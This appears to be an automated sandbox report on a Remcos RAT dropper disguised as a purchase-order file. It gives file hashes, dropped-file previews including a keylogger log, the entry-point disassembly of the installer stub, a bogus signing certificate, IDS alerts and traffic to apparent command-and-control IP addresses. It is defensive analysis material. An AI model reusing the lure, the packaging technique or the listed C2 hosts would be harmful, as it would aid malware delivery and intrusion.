                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<`..x...x...x......z...x..........i...,"..t.......y...Richx...........................PE..L....e.Q.................\....9......0.......p....@...........................B...../).......................................s........;.x...............8............................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data.....9..........r..............@....ndata.......0:..........................rsrc...x.....;......v..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):336
                                                                                                                                                              Entropy (8bit):3.356655712898892
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:6l+yZU5YcIeeDAlMl+y3bWAAe5Ul+yoR1Sl+5bWAv:6lNUecmlbbWFe5UlvlIbW+
                                                                                                                                                              MD5:183770575755236F422861F85A038751
                                                                                                                                                              SHA1:66FF2F3612C04F5201F7908E3063783D8AAEBA99
                                                                                                                                                              SHA-256:E298B516F71E4709ACBBB15B2AB86E30AFEF2F443CB5AABCBEC8143ED16647C2
                                                                                                                                                              SHA-512:25198A07073A1879BC0F128FF3F542A2B0F47F0F638C84FAFC5D007B2395A3547317CB73BBF042A5EF4B582A0C216E50F8C9DCD74AB3D15A18A94B06358FF405
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\kajsoiestc.dat, Author: Joe Security
                                                                                                                                                              Preview:....[.2.0.2.4./.0.4./.2.6. .0.9.:.4.1.:.5.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.0.4./.2.6. .0.9.:.4.1.:.5.5. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.0.4./.2.6. .0.9.:.4.1.:.5.8. .R.u.n.].........[.2.0.2.4./.0.4./.2.6. .0.9.:.4.2.:.0.0. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                                                                              Process:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):6060
                                                                                                                                                              Entropy (8bit):4.762086762453334
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:0smc7iVV4+i6p8k+4nvuflG87WhoDOeroI63XdnGkZh3:ewzk+wvufA8WhcrkZ3NGkZh3
                                                                                                                                                              MD5:260152E4D0A2F6373CB25F1AE3A9AAB2
                                                                                                                                                              SHA1:0A089FBAF1A9C986DAC0313900C2F4B43AC90A1A
                                                                                                                                                              SHA-256:4DE56A16047544581F6B889A4D6B3B13699C0025115260A67453C2BFC301549F
                                                                                                                                                              SHA-512:A25F3F1410070AF617CBC602E2379DE4E5CC3B33A9D07DC14314CCD9A896937A6D66B12D7F6FB06F3EB94671D2B3DE2A28B367FC6781982561673761CEB4C855
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.............mmmm......................L.....((((.+....5...R.....................................................................................................................................................................................................................................................................................LLL.QQQQ............y........JJJ...............^.......BBBBB....88.................q.J.....]...........SS.............................,....||.8...........................................mm.....................................e.....?............................o..RR................i.TTTTTT...........R..............kk....................{.^..===..mm........................RRR.[.=.....................Q.M....`...........................................o...........888.ggg............88888......99.b......-.7................................................s...........Y..........ll......!.............<......\..(((.{{{
                                                                                                                                                              Process:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):281794
                                                                                                                                                              Entropy (8bit):1.031572732289543
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:oslLjhedzTOljJJZU1Buju3jmpZOzcqM4uYLjqTSL6C7obTtV3tkQuHtJ2vj+CXu:oOJJZDj7341Vonj5aCZ
                                                                                                                                                              MD5:E828786A178F23B7F56B9990A65CEEA5
                                                                                                                                                              SHA1:0FFE78218DF805DA550BE16EE19E9946F39363B5
                                                                                                                                                              SHA-256:9BAAB1CDE953046954210F305136997005939F5EB8529DD51B2459034D0FBDFD
                                                                                                                                                              SHA-512:C4E5CBC49D03AA2C5E5EB2A2C9AD21CD9A375A98E686B5C3729C0B2B00A7CE5D7705E56F221F9B49538A433CCDA12F1DD65CE97C0D4DB9B1F9F8C8AC18A49CCC
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:........................................z.....1...............................................................................I..................................................................................f..................................................................................[...b..................................................................................................I.....H...R.K........M........................2....D......................................................./....................B...................................../...h..................................................u........?...........................S...............4..........M........._........................R..............................n......................................................................................................................Z........................................................................................................h............................
                                                                                                                                                              Process:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):138272
                                                                                                                                                              Entropy (8bit):7.780231739522803
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3072:Cc5JCyGs3xt/qeIiHZSiW9lm37do9ysGQGRcQPVinsSRnZNN:MLshlIA0Jvm37gy7fV7aZNN
                                                                                                                                                              MD5:1872E6A44091D3D4B08720C52D334A6E
                                                                                                                                                              SHA1:B5CEA5B4C4B1C137723089F746B969F89D84B3AF
                                                                                                                                                              SHA-256:0D3A3ED7FEA2A966434978158A8EF19CEF6355491285BB8ADF52515B67A5492C
                                                                                                                                                              SHA-512:915831066F678E14F331455353030713B9B9C745A04A275879EB9717403151A2DA37987C73AE26EC8381E6EAE984919A3D7875F0FC0D53DB3A83DF69581508A2
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.................."...............!......Y....."... ..............J.3.....j.%%%.............X...rrrrr....+.....7.iii....................MM........AA..(....1..........kk..............X..<......I....FFFF.........|......iiii.......-............w......................^^....`..f..:..............................-...mmm................@@@.............|||................hh.b....v................p....00.....%......TT.RRRRR................4....,,,.......................(......s........................K..............,,..&...:....................{{{........h..........l.^^.................WWWWWWWW..........m........Y..__......................?.........:::......JJJ..............R......................f!..c.aa.........1..........f.......[..f..........Vw.......T......a.......X.....7.........f...f.......X........#f......4z|..s.\..f.....q.wx......SU.qf!...1.4..........f..\...f......f.......1........f......<@...............;..|...,........9CJ..._..........f...f..... .f........F{........
                                                                                                                                                              Process:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):188525
                                                                                                                                                              Entropy (8bit):1.0329334808429573
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:5WINhheDhXPeDwAT/fXFKxz/nHTslCNCS6HKLs+SfWpHk6:LnFMplE6
                                                                                                                                                              MD5:04A03D1660020BED3AB9984BFAA2EF04
                                                                                                                                                              SHA1:21CB45D775B5DC16CABA3B80C3B458B3DBBCFB34
                                                                                                                                                              SHA-256:A0D4F715188B1044C5F9876491F8CECE5728D166DA60B9514DD244ECF42F29F6
                                                                                                                                                              SHA-512:352260C7501E0751FB93845B7BDDECA1BCC29DCFB745CCAA0A106556C2CA5787B0C64BCCAFDCC3FF2FF1AE0E428E03F8F6660AEFBF03EBF99A5C0D7769C3BEB9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.................................................O.................................................+........................................G..................b.................z.......y........................................................................................................P.........!...........................................................C..................................$.................................................................k.................x........1........................................................D.......................p................................................+................................f.....................C.....-............................~......................................................Z........b....................................................................................2............................................................................(.........G...........................................#...........
                                                                                                                                                              Process:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):78505
                                                                                                                                                              Entropy (8bit):1.024537818999984
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:OAC2dKLt1Lsw1d6OnQhcT+7ItGC3VVnxwZHr4WpJuHqLrJzE:5IYw1d6OnfT+8zWpJuIJz
                                                                                                                                                              MD5:F18075570354F7C71286D7E633605CE6
                                                                                                                                                              SHA1:1CE1B223EAE5AE1BF61B72A4032953271A07C3CC
                                                                                                                                                              SHA-256:50B67542F8655D7110CD14285A6E8BFD3F238B3AF26985D7F57C48F78A0BB646
                                                                                                                                                              SHA-512:FE91EA361444335D3B67691CBA1776A94D5BDBA16359D507F1B6042A02F6F4C4A2B9FF8E45609759EAA51F94F17D47E28DA7995BB123E9B742900DACE917F018
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.......................x.................. .......................................Q.......~.......................:..........................................................+.............W......l....................?[...........................W...........V.o..*...............)..........N.......................................A..........................................................!........^....................-...+..............................`........................h......................................f...........\....a.....................................C.............y................................................................................S.......................................................................................................y.........................................c............B...............................G..................................<...............K=..........................................................................................
                                                                                                                                                              Process:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):284271
                                                                                                                                                              Entropy (8bit):1.0251357322266477
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:3ikksaRhO0tDtDHT4agsOypRJ5UVofBnhIOPNs28Bu7LYDRa5dv8Kn8GBrhGmVxr:FiRk48kL78Ka
                                                                                                                                                              MD5:FCF65B7D81E9B8F78EC8C24CA3092A8A
                                                                                                                                                              SHA1:700291ADFE86A3022D39E46E71D9E44E158C6F6D
                                                                                                                                                              SHA-256:A91235C263F3C28790B391F6EAD3ED10F674FBF7FC5E10A3640F9937902273E8
                                                                                                                                                              SHA-512:C1F136D6C9CAD6A9195DA2690A8FCF2640A364DC6D636B2B8218C7022A59D2E99305ECDD201B614A92CE7EC4A955FC7C3389B7862BD25CACC531DFDE3B2DAEF3
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:...........................1...............................................&......................................~...................i.........................v.....................................................................................................................................D........y................m......................................................]..........F..J..........................................:.....#.......p. .........k................................................{..............Q..........=.....................................................................@............s....l..........u........................................................................[..........................................................................................................................\..............<........................................i...........................g.....................................................I................R.X.0............
                                                                                                                                                              Process:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):494
                                                                                                                                                              Entropy (8bit):4.230726516650528
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:pKG5STxNjA4TkEIQT5i6Dk3Qm0oyyGq2qAOaUwbeKWjNB/JJsn:pP5STx5jTkqT5iMJiRaUWedBBBJsn
                                                                                                                                                              MD5:19B947E1171EC056B5989798225E3080
                                                                                                                                                              SHA1:C8703F1F4AE3A1A81924FAF13F7305CBA4AEF6CA
                                                                                                                                                              SHA-256:D7F13F88A63E6A8EDB1DD1A5C194004A3FC24C870D2AC6013FAF13AFC6E77577
                                                                                                                                                              SHA-512:E0E4878AF414BD2845ED7A63AEA844DAD77BDAD375D2BD6A2A69DE9A8730571059BCA5C7F937C2BD5205D13D92CFE8B22684214EB0BA673C9446F10DEBF24D25
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:dentical baldrende kekchi colectomies cupressus roofers..overregulates reaccumulation travestiernes ecdyson mezentius garnngle spasticitets brnehavelrerindernes liplike electrodiplomatic..heteropelmous traadls statsoverhoveder eftersprgselspressenes.skrsliberne aspired twaddles mangle gentoo porphyrogenitus quislingers.underteamed bonitet prostigmin kontorsystemers fresser shutterbugs forlngerledningen velokalernes moguey..nonsympathetically lutetian friarealer sciatically hosea stymperes,
                                                                                                                                                              Process:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):217824
                                                                                                                                                              Entropy (8bit):1.0399386438008156
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:TxtDvwwKe7lLjmPR6s64AFEdo7QFOIZ8v6oS/88AGuh7Wz+dUa826EL6tqZscZGg:XgCj6kzuIT
                                                                                                                                                              MD5:0CDAC4CECC5709A94D54CCAED51945E0
                                                                                                                                                              SHA1:DA022C65989787E3C16C0FD4754FEB55E2851D60
                                                                                                                                                              SHA-256:A6EBB5155B1EB41CF2485F84E7FD89ECC3FEB27B0EAD2F11107495E662BC776F
                                                                                                                                                              SHA-512:4D54F9D2CAFA7E6D88BA394D17B4748D37ADAB57D0F18AC2D9162F4789D3EF3599CCE94570195525699819ACFBD8A56E44B15B2735382737675ABA34BF663642
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:..4..................a........................................................................................p................................r......................................................................................A..........@.^.....b............................................".X........................=..............i.......................................................................................................(......................................................$..............................q...................................................................../.........#...........a............................................................;..............W.........................................................B...............:............................q.......$...............................A.......................................a.........................................J............................<...................................................
                                                                                                                                                              Process:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):30
                                                                                                                                                              Entropy (8bit):4.01506101220307
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:+f4tfEOGOWbP:U4tf9GOWbP
                                                                                                                                                              MD5:9A87E14E4F6590E4B39073FCF55944A4
                                                                                                                                                              SHA1:4AF8D2E9EE06321E83497982ED8E55AF244A8B07
                                                                                                                                                              SHA-256:D6E32A651EBDD996FB69025D557FECFCD8547729091BF76327B0A118A6D333FC
                                                                                                                                                              SHA-512:128B8180EFD08F7A86635694A4B7CE634A24636E851D4A293F9B677AA4BC9A5F6D0EDD61896F4D7FB74F55E99B929822A6FF5AF0FE6428BE9EE4D14AFEB37B34
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:[menthane]..raffaele=voksvrk..
                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                              Entropy (8bit):5.920917801812331
                                                                                                                                                              TrID:
                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                                                                              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                              File name:PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              File size:771'320 bytes
                                                                                                                                                              MD5:dbe4440d32dc0b20dee76c192587ab33
                                                                                                                                                              SHA1:d5c94559655c5fc5bc552fce62aad8673731a3bb
                                                                                                                                                              SHA256:8059dc704b71f1a978547729e4afdf62f0c834950758ca8bb6a25fa6fca0b03d
                                                                                                                                                              SHA512:13eea3b51fce84b90b363de9b05f6e08fa0c082b67f0be91146f241ab49f7d421fec5d81b5507c6df396bdba21e71b6cef176f8a70a0d972c11cf2ad7d768efa
                                                                                                                                                              SSDEEP:6144:9zZzl4awJ9Gal0ZcMGDTBRA5bASrGs/1iLJ0ca8EptqioUCaSniaVgkpmcqaw/c0:DaalkPhH8V/kLBa8CwioQAxjw/ar4vd
                                                                                                                                                              TLSH:54F4122C3A64E43EC294DA354C51CA7F9EB56E605F586313BFA07FDD2631AE6AB00131
                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<`..x...x...x.......z...x...........i...,"..t.......y...Richx...........................PE..L....e.Q.................\....9....
                                                                                                                                                              Icon Hash:230b0918910b4909
                                                                                                                                                              Entrypoint:0x4030ef
                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                              Digitally signed:true
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                              Time Stamp:0x519965C7 [Sun May 19 23:52:39 2013 UTC]
                                                                                                                                                              TLS Callbacks:
                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                              OS Version Major:4
                                                                                                                                                              OS Version Minor:0
                                                                                                                                                              File Version Major:4
                                                                                                                                                              File Version Minor:0
                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                              Import Hash:b40f29cd171eb54c01b1dd2683c9c26b
                                                                                                                                                              Signature Valid:false
                                                                                                                                                              Signature Issuer:E=Duplicidentata@Trojanskes.He, O=Bakterielle, OU="Suingly Svagfrt Adresserne ", CN=Bakterielle, L=Byron, S=California, C=US
                                                                                                                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                              Error Number:-2146762487
                                                                                                                                                              Not Before, Not After
                                                                                                                                                              • 05/06/2023 03:23:29 04/06/2026 03:23:29
                                                                                                                                                              Subject Chain
                                                                                                                                                              • E=Duplicidentata@Trojanskes.He, O=Bakterielle, OU="Suingly Svagfrt Adresserne ", CN=Bakterielle, L=Byron, S=California, C=US
                                                                                                                                                              Version:3
                                                                                                                                                              Thumbprint MD5:1289C4D876E1B947CAE640B657F3514B
                                                                                                                                                              Thumbprint SHA-1:AFE859A1F2026A6FF2E52C3628742A22194DAE28
                                                                                                                                                              Thumbprint SHA-256:810572A0887736DD84468E5FF4CF7150BC4A80C2C577575F311664F6044CF6C7
                                                                                                                                                              Serial:13B47D669AEFCD3415FC387A13A2E4CB9309970A
                                                                                                                                                              Instruction
                                                                                                                                                              sub esp, 00000184h
                                                                                                                                                              push ebx
                                                                                                                                                              push ebp
                                                                                                                                                              push esi
                                                                                                                                                              xor ebx, ebx
                                                                                                                                                              push edi
                                                                                                                                                              mov dword ptr [esp+1Ch], ebx
                                                                                                                                                              mov dword ptr [esp+10h], 00409190h
                                                                                                                                                              mov dword ptr [esp+18h], ebx
                                                                                                                                                              mov byte ptr [esp+14h], 00000020h
                                                                                                                                                              call dword ptr [00407034h]
                                                                                                                                                              push 00008001h
                                                                                                                                                              call dword ptr [004070B0h]
                                                                                                                                                              push ebx
                                                                                                                                                              call dword ptr [0040728Ch]
                                                                                                                                                              push 00000008h
                                                                                                                                                              mov dword ptr [007A27B8h], eax
                                                                                                                                                              call 00007FC180678583h
                                                                                                                                                              mov dword ptr [007A2704h], eax
                                                                                                                                                              push ebx
                                                                                                                                                              lea eax, dword ptr [esp+38h]
                                                                                                                                                              push 00000160h
                                                                                                                                                              push eax
                                                                                                                                                              push ebx
                                                                                                                                                              push 0079DCB8h
                                                                                                                                                              call dword ptr [00407164h]
                                                                                                                                                              push 00409180h
                                                                                                                                                              push 007A1F00h
                                                                                                                                                              call 00007FC18067822Dh
                                                                                                                                                              call dword ptr [0040711Ch]
                                                                                                                                                              mov ebp, 007A8000h
                                                                                                                                                              push eax
                                                                                                                                                              push ebp
                                                                                                                                                              call 00007FC18067821Bh
                                                                                                                                                              push ebx
                                                                                                                                                              call dword ptr [00407114h]
                                                                                                                                                              cmp byte ptr [007A8000h], 00000022h
                                                                                                                                                              mov dword ptr [007A2700h], eax
                                                                                                                                                              mov eax, ebp
                                                                                                                                                              jne 00007FC18067581Ch
                                                                                                                                                              mov byte ptr [esp+14h], 00000022h
                                                                                                                                                              mov eax, 007A8001h
                                                                                                                                                              push dword ptr [esp+14h]
                                                                                                                                                              push eax
                                                                                                                                                              call 00007FC180677CC8h
                                                                                                                                                              push eax
                                                                                                                                                              call dword ptr [00407220h]
                                                                                                                                                              mov dword ptr [esp+20h], eax
                                                                                                                                                              jmp 00007FC1806758D0h
                                                                                                                                                              cmp cl, 00000020h
                                                                                                                                                              jne 00007FC180675818h
                                                                                                                                                              inc eax
                                                                                                                                                              cmp byte ptr [eax], 00000020h
                                                                                                                                                              je 00007FC18067580Ch
                                                                                                                                                              Programming Language:
                                                                                                                                                              • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3bf0000x6a378.rsrc
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0xbbac00xa38.data
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                              .text0x10000x5bc20x5c00d75213ff3654bd251ba7ede13ba551f3False0.6815132472826086data6.5073852787100455IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                              .rdata0x70000x11ce0x12006c31e0693072284f258d2c4a271de506False0.4524739583333333OpenPGP Secret Key5.236327486414569IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                              .data0x90000x3997f80x400cc4b8c7cfe81dc194cfb0c595288fc86unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .ndata0x3a30000x1c0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .rsrc0x3bf0000x6a3780x6a40004be3c14850d27fcfbdd5a392db90cbdFalse0.32402573529411766data3.5995986007900855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                              RT_ICON0x3bf3880x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.3010104447140279
                                                                                                                                                              RT_ICON0x4013b00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.33113983201230335
                                                                                                                                                              RT_ICON0x411bd80x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.36522493167963
                                                                                                                                                              RT_ICON0x41b0800x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.3755545286506469
                                                                                                                                                              RT_ICON0x4205080x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.3767123287671233
                                                                                                                                                              RT_ICON0x4247300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4095435684647303
                                                                                                                                                              RT_ICON0x426cd80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4472326454033771
                                                                                                                                                              RT_ICON0x427d800x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5069672131147541
                                                                                                                                                              RT_ICON0x4287080x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5549645390070922
                                                                                                                                                              RT_DIALOG0x428b700x120dataEnglishUnited States0.5138888888888888
                                                                                                                                                              RT_DIALOG0x428c900x11cdataEnglishUnited States0.6091549295774648
                                                                                                                                                              RT_DIALOG0x428db00xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                              RT_DIALOG0x428e780x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                              RT_GROUP_ICON0x428ed80x84dataEnglishUnited States0.7196969696969697
                                                                                                                                                              RT_VERSION0x428f600x148x86 executable not strippedEnglishUnited States0.600609756097561
                                                                                                                                                              RT_MANIFEST0x4290a80x2cbXML 1.0 document, ASCII text, with very long lines (715), with no line terminatorsEnglishUnited States0.5664335664335665
                                                                                                                                                              DLLImport
                                                                                                                                                              KERNEL32.dllSleep, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, CompareFileTime, SearchPathA, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, SetFileAttributesA, lstrcmpiA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, GetCommandLineA, GetTempPathA, FreeLibrary, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, WriteFile, MultiByteToWideChar
                                                                                                                                                              USER32.dllCreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
                                                                                                                                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                              SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                                                                                                              ADVAPI32.dllRegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                                                              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                                              ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                                                                                                              VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                              EnglishUnited States
                                                                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                              04/26/24-09:42:02.921686TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin503013980192.168.11.20172.94.9.228
                                                                                                                                                              04/26/24-09:46:14.616756TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response398050301172.94.9.228192.168.11.20
                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Apr 26, 2024 09:41:53.753849983 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:53.962802887 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:53.963040113 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:53.963989019 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.172534943 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.173407078 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.173486948 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.173544884 CEST805030094.156.8.104192.168.11.20
